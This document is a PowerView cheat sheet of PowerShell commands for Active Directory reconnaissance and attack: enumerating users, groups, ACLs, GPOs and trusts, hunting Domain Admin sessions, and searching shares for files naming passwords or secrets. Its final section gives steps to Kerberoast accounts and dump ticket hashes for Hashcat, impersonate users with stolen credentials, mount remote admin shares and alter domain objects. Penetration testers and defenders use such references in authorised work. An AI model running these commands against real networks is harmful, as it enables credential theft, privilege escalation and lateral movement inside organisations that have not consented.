Powerview Cheatsheet

Powerful PowerShell Module for AD enumeration and some attacks exploitation

Users

# count the domain users

$ (Get-DomainUser).count

# return some properties for a user and export to CSV

$ Get-DomainUser -Identity $USER -Domain $DOMAIN | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogont,timestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,mail,useraccountcontrol | Export-Csv .\inlanefreight_users.csv -NoTypeInformation

# return users with PreAuth disabled

$ Get-DomainUser -KerberosPreauthNotRequired -Properties samaccountname,useraccountcontrol,memberof

# return users with Constrained Delegation

$ Get-DomainUser -TrustedToAuth -Properties samaccountname,useraccountcontrol,memberof

# users with Unconstrained Delegation

$ .\SharpView.exe Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)"

# returns non-empty description fields for domain users (possible password)

$ Get-DomainUser -Properties samaccountname,description | Where {$_.description -ne $null}

# enumerate users with SPNs

$ Get-DomainUser -SPN -Properties samaccountname,memberof,serviceprincipalname

# find users from other domains

$ Find-ForeignGroup

# return users with passwords sorted by pwdlastset

$ Get-DomainUser -Properties samaccountname,pwdlastset,lastlogon -Domain $DOMAIN | select samaccountname, pwdlastset, lastlogon | Sort-Object -Property pwdlastset

# show users with passwords set before 90 days ago

$ Get-DomainUser -Properties samaccountname,pwdlastset,lastlogon -Domain $DOMAIN | select samaccountname, pwdlastset, lastlogon | where { $_.pwdlastset -lt (Get-Date).addDays(-90) }

# convert username to SID

$ ConvertTo-SID -Name $USER

# convert SID to username

$ Convert-ADName -ObjectName S-1-5-21-921xxxxxxxxxx-x-xx-1724

# convert UAC numeric values to readable format, -showall marks the ones set with +

$ Get-DomainUser $USER | ConvertFrom-UACValue -showall

Groups

# get all domain groups

$ Get-DomainGroup -Properties Name

# get members of a group

$ Get-DomainGroupMember -Identity '$GROUP'

# get members of a group recursively (nested groups)

$ Get-DomainGroupMember -Identity '$GROUP' -Recurse

# get protected groups (AdminCount set)

$ Get-DomainGroup -AdminCount

# get all objects a user is a member of

$ Get-DomainGroup -UserName $USER

# list managed security groups

$ Find-ManagedSecurityGroups | select GroupName

# get groups and their group manager

$ Get-DomainManagedSecurityGroup

# see what a manager can do on a group

$ $sid = ConvertTo-SID $USER; Get-DomainObjectAcl -Identity '$GROUP' | ?{$_.SecurityIdentifier -eq $sid}

# list local group names on a remote machine

$ Get-NetLocalGroup -ComputerName $FQDN | select GroupName

# get members of all local groups on a remote machine

$ Get-NetLocalGroupMember -ComputerName $FQDN

# find all local hosts a user has local admin access over through a group

$ $sid = Convert-NameToSid $USER; $computers = Get-DomainComputer -Properties dnshostname | select -ExpandProperty dnshostname; foreach ($line in $computers) {Get-NetLocalGroupMember -ComputerName $line | ?{$_.SID -eq $sid}}

# get when a user was added to a group

$ Import-Module Get-ADGroupMemberDate.ps1; Get-ADGroupMemberDate -Group '$GROUP' -DomainController $FQDN | ? { ($_.Username -match $USER) -And ($_.State -NotMatch 'ABSENT' ) }

Computers

# list all computers with hostname, OS, last logon, UAC

$ Get-DomainComputer -Properties dnshostname,operatingsystem,lastlogontimestamp,useraccountcontrol

# export computers to CSV

$ Get-DomainComputer -Properties dnshostname,operatingsystem,lastlogontimestamp,useraccountcontrol | Export-Csv .\computers.csv -NoTypeInformation

# list computers with unconstrained delegation

$ Get-DomainComputer -Unconstrained -Properties dnshostname,useraccountcontrol

# list computers with constrained delegation

$ Get-DomainComputer -TrustedToAuth | select -Property dnshostname,useraccountcontrol

# return all domain controllers in the current domain

$ Get-DomainController

# return all domain controllers for a specified domain

$ Get-DomainController -Domain $DOMAIN

# return users actively logged on to a remote machine (requires admin)

$ Get-NetLoggedon -ComputerName $FQDN

# return session information on a remote machine

$ Get-NetSession -ComputerName $FQDN

# return who is logged on via remote registry enumeration (stealthier)

$ Get-RegLoggedOn -ComputerName $FQDN

# return active RDP sessions on a remote machine

$ Get-NetRDPSession -ComputerName $FQDN

# test if current user has local admin access on a remote machine

$ Test-AdminAccess -ComputerName $FQDN

# test admin access across all domain machines

$ Get-DomainComputer | Test-AdminAccess

# return the last user who logged onto a remote machine via registry

$ Get-WMIRegLastLoggedOn -ComputerName $FQDN

# return cached outgoing RDP connections from a remote machine

$ Get-WMIRegCachedRDPConnection -ComputerName $FQDN

# return saved network drives on a remote machine

$ Get-WMIRegMountedDrive -ComputerName $FQDN

# return running processes and their owners on a remote machine

$ Get-WMIProcess -ComputerName $FQDN

Domain

# return information about the domain (name, child domains, DCs, roles)

$ Get-Domain

# list domain OUs

$ Get-DomainOU | findstr /b "name"

# return the SID of the current domain

$ Get-DomainSID

# return the forest object (name, root domain, child domains)

$ Get-Forest

# return all domains within the current forest

$ Get-ForestDomain

# return all global catalog servers in the forest

$ Get-ForestGlobalCatalog

# enumerate all DNS zones in the domain

$ Get-DomainDNSZone

# enumerate all DNS records within a specific zone

$ Get-DomainDNSRecord -ZoneName $DOMAIN

# return likely file servers in the domain

$ Get-DomainFileServer

# return all DFS shares in the domain

$ Get-DomainDFSShare

# return all subnets defined in AD Sites and Services

$ Get-DomainSubnet

# return the default domain password policy

$ Get-DomainPolicy

# return the domain controller policy

$ Get-DomainPolicy -Policy DC

# get domain policy using net accounts

$ net accounts

ACLs

# get ACLs for a specific AD object

$ Get-DomainObjectAcl -Identity $USER -ResolveGUIDs

# find ACLs across the domain where non-default principals have modification rights

$ Find-InterestingDomainAcl -ResolveGUIDs

# get ACLs for a specific domain user using built-in cmdlets

$ (Get-ACL "AD:$((Get-ADUser $USER).distinguishedname)" ).access | ? {$_.IdentityReference -eq "$DOMAIN\$USER" }

# find all users with WriteProperty or GenericAll over a target user

$ (Get-ACL "AD:$((Get-ADUser $USER).distinguishedname)" ).access | ? {$_.ActiveDirectoryRights -match "WriteProperty" -or $_.ActiveDirectoryRights -match "GenericAll" } | Select IdentityReference,ActiveDirectoryRights -Unique | ft -W

# find all users with DCSync rights over the domain object

$ $dcsync = Get-ObjectACL "DC=$DOMAIN,DC=local" -ResolveGUIDs | ? { ($_.ActiveDirectoryRights -match 'GenericAll' ) -or ($_.ObjectAceType -match 'Replication-Get' )} | Select-Object -ExpandProperty SecurityIdentifier | Select -ExpandProperty value; Convert-SidToName $dcsync

# get share ACLs on a remote machine

$ Get-NetShare -ComputerName $FQDN; Get-PathAcl "\\$FQDN\$SHARE"

GPOs

# return all GPOs in the domain

$ Get-DomainGPO | select displayname

# return GPOs applied to a specific machine

$ Get-DomainGPO -ComputerName $FQDN | select displayname

# get GPO results for a user

$ gpresult /r /user:$USER

# get GPO results for a remote machine

$ gpresult /r /S $FQDN

# output GPO results to HTML

$ gpresult /h something.html

# find GPOs where Domain Users group has permissions

$ Get-DomainGPO | Get-ObjectAcl | ? {$_.SecurityIdentifier -eq 'S-1-5-21-2974783224-3764228556-2640795941-513' }

# get GPO display name by GUID

$ Get-GPO -Guid $GUID

# return all GPOs that modify local group memberships

$ Get-DomainGPOLocalGroup

# find all machines where a specific user/group is local admin through GPO

$ Get-DomainGPOUserLocalGroupMapping -Identity $USER

# find all machines where Domain Users are mapped to local admins via GPO

$ Get-DomainGPOUserLocalGroupMapping -LocalGroup Administrators

# return what users/groups are local admins on a machine via GPO

$ Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity $FQDN

Trusts

# return all trusts for the current domain

$ Get-DomainTrust

# return trusts for a specific domain

$ Get-DomainTrust -Domain $DOMAIN

# return all forest-level trusts

$ Get-ForestTrust

# map all trusts recursively across every domain found

$ Get-DomainTrustMapping

# return users that belong to groups in other domains

$ Get-DomainForeignUser

# return groups that contain members from outside the group's domain

$ Get-DomainForeignGroupMember

# return foreign group members from a specific domain

$ Get-DomainForeignGroupMember -Domain $DOMAIN

Hunting

# find machines where Domain Admins are currently logged in

$ Find-DomainUserLocation -GroupName "Domain Admins"

# find machines where a specific user is logged in

$ Find-DomainUserLocation -UserName $USER

# stealth version - checks via file server/DC sessions only

$ Find-DomainUserLocation -Stealth

# find machines running a specific process

$ Find-DomainProcess -ProcessName "mimikatz.exe"

# find machines where a specific user owns a running process

$ Find-DomainProcess -UserName $USER

# find logon events for a specific user across the domain

$ Find-DomainUserEvent -UserName $USER

# find all reachable shares across domain machines

$ Find-DomainShare

# find all reachable shares including ones only accessible to current user

$ Find-DomainShare -CheckShareAccess

# search readable shares across the domain for interesting files

$ Find-InterestingDomainShareFile

# search for specific file patterns across all readable domain shares

$ Find-InterestingDomainShareFile -Include *.xml,*.ini,*.txt,*.config

# find all machines where current user has local admin access

$ Find-LocalAdminAccess

# enumerate local Administrators group members across all domain machines

$ Find-DomainLocalGroupMember -GroupName Administrators

# search for interesting files in a share

$ Find-InterestingFile -Path \\$FQDN\SYSVOL -Include *.xml,*.ini,*.config

# search for files containing sensitive keywords in a share

$ Find-InterestingFile -Path \\$FQDN\IT -SearchTerms "password" ,"creds","secret"

Misc

# request a Kerberos ticket for a specific SPN

$ Get-DomainSPNTicket -SPN "MSSQLSvc/$FQDN:1433"

# find all kerberoastable accounts and dump their ticket hashes

$ Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash

# get ACLs for a file or share path

$ Get-PathAcl -Path \\$FQDN\SYSVOL

# export domain users to CSV in a thread-safe manner

$ Get-DomainUser | Export-PowerViewCSV -Path C:\output\users.csv

# mount a connection to a remote share using provided credentials

$ Add-RemoteConnection -Path \\$FQDN\C$ -Credential $cred

# remove a previously mounted remote connection

$ Remove-RemoteConnection -Path \\$FQDN\C$

# impersonate another user using runas /netonly style logon

$ Invoke-UserImpersonation -Credential $cred

# revert back to original token after impersonation

$ Invoke-RevertToSelf

# resolve hostname to IP

$ Resolve-IPAddress $FQDN

# return all domain objects and their properties

$ Get-DomainObject -Identity $USER

# modify a property on a domain object

$ Set-DomainObject -Identity $USER -Set @{description="test"}